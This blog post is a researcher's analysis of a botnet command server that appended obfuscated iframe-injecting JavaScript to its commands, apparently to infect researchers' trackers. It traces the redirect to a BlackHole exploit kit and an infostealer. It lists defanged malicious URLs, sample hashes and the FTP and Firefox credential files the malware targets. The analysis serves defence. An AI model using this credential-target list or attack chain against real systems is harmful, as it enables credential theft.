Beware the trolls, secure your trackers

Posted on August 14, 2012 | Category :Botnets, Malware | Comments Off

by Claudio Guarnieri

(Note: the post was originally written on Aug 8th 2012)

You track botnets? Right, we do as well.
You spent your weekends building your slick botnet trackers and some fancy web interface? Damn, we did too.

But let’s face the truth, DDoS is f**king boring. What gives better sense to your day than some random crook trolling you and your monitoring infrastructure? Nothing.
So here’s what happened today…

Since I’m not really following the DDoS scene a lot lately, I kinda left over for some time the trackers that I built and that we are using internally in Shadowserver. Today I decided to open it up again just to show it some love and check if there was anything interesting being targeted, while sipping my coffee.
I was expecting the usual amount of porn websites, random Russian forums, Lineage II shards and the traditional average target for the traditional average botnet, but that wasn’t the case today… something stood up.

One of the DirtJumper botnets we are tracking, located on the domain “bnbgcw.com” started spreading some weird commands:

The beginning of the command is a traditional DirtJumper response, some basic parameters (like threads, duration of attack, delay of C&C polling and such) separated by a dash and followed by the actual target of the DDoS attack, and here comes the funny thing. Appended to the original target (which was already being attacked previously and that isn’t really relevant for us at this stage) is a whole bunch of obfuscated JavaScript code.

I removed the whole obfuscated code, but you can see it decoded as follows:

 

So what this thing does in short is:

  1. dynamically generate a domain out of a given seed and the current date
  2. use the domain to build a landing URL
  3. embed the URL in an <iframe> which is then printed in the page body
In the end, it will load a page located at:
hxxp://kegkvfoagyqoouky[.]ru/in.cgi?15

So, assuming that this guy is not dumb enough to possibly try to magically remote exploit or inject the target page through the use of his botnet, my idea is that what he is actually trying achieve is exploit security researchers like us that are tracking his own botnet.
It’s actually quite a sharp idea: your tracker pulls the command from his C&C, store it in some sort of database and print it in your fancy web interface, you didn’t bother to sanitize the data, the <iframe> gets embedded in your own page and BANG, your pwned.

If you run the URL through Thug (thanks Angelo!), you’ll see that the page (when meeting certain requirements) actually redirects to:

hxxp://wertbuy.toythieves[.]com/main.php?page=9dd146e88937797b

A BlackHole setup which, after a failed attempt of loading a Java applet Torb.jar (1/41), successfully used the infamous Microsoft MDAC RDS.Dataspace ActiveX vulnerability to exploit the browser and drop the payload. Nothing new, traditional BlackHole behavior, but you can find the complete Thug report here.
Upon successful exploitation, it drops a  payload with the following characteristics:

File size: 348672 bytes
File type: PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
CRC32: C9ABC946
MD5: 4ce73d6a52bfa3f56c67942f8ebf2c69
SHA1: 6ce4f9bbf786f69a51d7f54e2cc190e438eb1c24
SHA256: ac81dc130e331d6e0f09e58b520981776aebfaf8e3dab68e96d4e2252b0a6f7c
SHA512: b2d7edba3470c179873555e2937cd28c471a6b4da83632157d27cc7d2d58caffe97f7a2fc63199ed83d3d251fd0dbae849b86a1860234aecac0594e18bdd5036
Ssdeep: 1536:Qy23ZX+7rtoub3aBsUV+xhhD2a4ToJsQ0fd3AonLa:Qy2Ngr3Ev+tya99

We are not sure yet about the nature of the malware as it an extremely low detection rate (1/40), but it looks consistent to Pony, a loader and infostealer widely used in ZeuS campaigns.
The first reason we believe it is because, just like Pony, this sample is not persistent: it executes from the memory, deletes itself and just disappear.
The second reason is because of the data it tries to collect and steal:

C:\Documents and Settings\User\Application Data\GlobalSCAPE\CuteFTP\sm.dat
C:\Documents and Settings\User\Application Data\GlobalSCAPE\CuteFTP\
C:\Documents and Settings\User\Application Data\GlobalSCAPE\CuteFTP Pro\sm.dat
C:\Documents and Settings\User\Application Data\GlobalSCAPE\CuteFTP Pro\
C:\Documents and Settings\User\Application Data\GlobalSCAPE\CuteFTP Lite\sm.dat
C:\Documents and Settings\User\Application Data\GlobalSCAPE\CuteFTP Lite\
C:\Documents and Settings\User\Application Data\CuteFTP\sm.dat
C:\Documents and Settings\User\Application Data\CuteFTP\
C:\Documents and Settings\User\Application Data\FlashFXP\3\Sites.dat
C:\Documents and Settings\User\Application Data\FlashFXP\4\Sites.dat
C:\Documents and Settings\User\Application Data\FlashFXP\3\Quick.dat
C:\Documents and Settings\User\Application Data\FlashFXP\4\Quick.dat
C:\Documents and Settings\User\Application Data\FlashFXP\3\History.dat
C:\Documents and Settings\User\Application Data\FlashFXP\4\History.dat
C:\Documents and Settings\User\Application Data\FileZilla\sitemanager.xml
C:\Documents and Settings\User\Application Data\FileZilla\recentservers.xml
C:\Documents and Settings\User\Application Data\FileZilla\filezilla.xml
C:\Documents and Settings\User\Application Data\SmartFTP\
C:\Documents and Settings\User\Application Data\TurboFTP\
C:\Documents and Settings\User\Application Data\FTP Explorer\
C:\Documents and Settings\User\Application Data\Frigate3\
C:\Documents and Settings\User\Application Data\VanDyke\Config\Sessions\
C:\Documents and Settings\User\Application Data\Mozilla\Firefox\profiles.ini
C:\Documents and Settings\User\Application Data\Mozilla\Firefox\Profiles\abcdefgh.default\
C:\Documents and Settings\User\Application Data\Mozilla\Firefox\Profiles\abcdefgh.default\bookmarkbackups\
C:\Documents and Settings\User\Application Data\Mozilla\Firefox\Profiles\abcdefgh.default\minidumps\
C:\Documents and Settings\User\Application Data\Mozilla\Firefox\Profiles\abcdefgh.default\signons.sqlite
C:\Documents and Settings\User\Application Data\Mozilla\Firefox\Profiles\abcdefgh.default\secmod.db
C:\Documents and Settings\User\Application Data\Mozilla\Firefox\Profiles\abcdefgh.default\cert8.db
C:\Documents and Settings\User\Application Data\Mozilla\Firefox\Profiles\abcdefgh.default\key3.db

And much much more…

It then establishes a network communication to “coppercreek.ru”:

We are not sure about the nature of the encryption, it will need more time to analyze it. If you already encountered this and you are able to recognize the family, please let us know.
No additional payload was dropped.

It’s very interesting to note that this payload was uploaded both on VirusTotal and on Malwr.com today from a Verizon Wireless connection in USA. As you can see the analysis on Malwr failed (side note: Malwr is currently running a very outdated version of Cuckoo Sandbox, whose version 0.4 is perfectly able to analyze this sample).
This attack has been going on for a couple of days already, but the latest version has been updated today.
A very similar version of this sample, with same behavior and file name, has been uploaded by the same guy a few days earlier on Malwr.com and on VirusTotal again.
In that case the results of Malwr’s analysis as well as Antiviruses detection were much better, therefore, unless some of you guys come up these days to tell me it was him, this makes me believe that the mastermind behind these attacks has been actively trying to enhance his evasion and anti-detection techniques until he reached satisfying results.

This could be a whole big speculation, the guy might just be totally dumb and there was no intention to actually target botnet researchers.
But if this was actually a correct interpretation, it’s a very interesting learning experience and a warning to all the researchers out there feeling safe: our security panopticon could actually turn inside out and making us the ones being watched.

Update #1: the detection rate of the sample increased to 16/41 at this time.

Update #2: Our friend Armin from WebSense informed us that this attack matches with an ongoing campaign that they have been tracking. Seems like this DirtJumper C&C got compromised and it’s distributing the JavaScript code we presented. It’s kinda hilarious, crooks getting pwnd by other crooks, but the result is still the same: some harmful code included in the context of trusted applications as our botnet trackers are.

Comments are closed.